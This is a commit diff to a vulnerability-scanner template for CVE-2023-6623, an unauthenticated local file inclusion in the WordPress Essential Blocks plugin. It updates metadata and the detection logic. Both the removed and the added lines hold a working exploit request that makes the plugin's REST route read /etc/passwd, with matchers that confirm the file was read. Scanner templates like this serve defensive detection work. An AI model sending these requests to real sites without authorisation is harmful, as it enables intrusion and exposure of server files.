Update CVE-2023-6623.yaml

2024-01-10 19:49:47 +05:30 · 2024-01-10 19:49:47 +05:30 · 343d1325b0
parent 33031d6c08
commit 343d1325b0
1 changed files with 18 additions and 24 deletions
--- a/http/cves/2023/CVE-2023-6623.yaml
+++ b/http/cves/2023/CVE-2023-6623.yaml
@ -1,45 +1,39 @@
 id: CVE-2023-6623

 info:
-  name: Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion
-  author: coldfish
-  severity: high
-  description: The plugin does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.
+  name: Essential Blocks < 4.4.3 - Local File Inclusion
+  author: iamnoooob,rootxharsh,pdresearch,coldfish
+  severity: critical
+  description: |
+    Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
-    Upgrade Essential Blocks to version 4.4.3 or later to mitigate the vulnerability.
+    Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
  reference:
-    - https://wpscan.com/vulnerability/633c28e0-0c9e-4e68-9424-55c32789b41f/
+    - https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
    - https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
-    - https://s3cur1ty.ch/posts/essential-blocks/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6623
  metadata:
+    max-request: 2
    verified: true
-    max-request: 1
    publicwww-query: "/wp-content/plugins/essential-blocks/"
-  tags: cve,cve2023,wordpress,wp-plugin,wpscan,essential-blocks,lfi
+  tags: cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi

 http:
  - method: GET
    path:
-      - '{{BaseURL}}/wp-json/essential-blocks/v1/queries?attributes=%7B%22__file%22%3A+%22%2Fetc%2Fpasswd%22%7D'
+      - '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
+      - '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'

-    matchers-condition: and
    matchers:
-      - type: regex
-        part: body
-        regex:
-          - "root:.*:0:0:"
-
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "regex('root:.*:0:0:', body_1)"
+          - 'contains(body_2, "Essential Blocks – Page")'
+        condition: and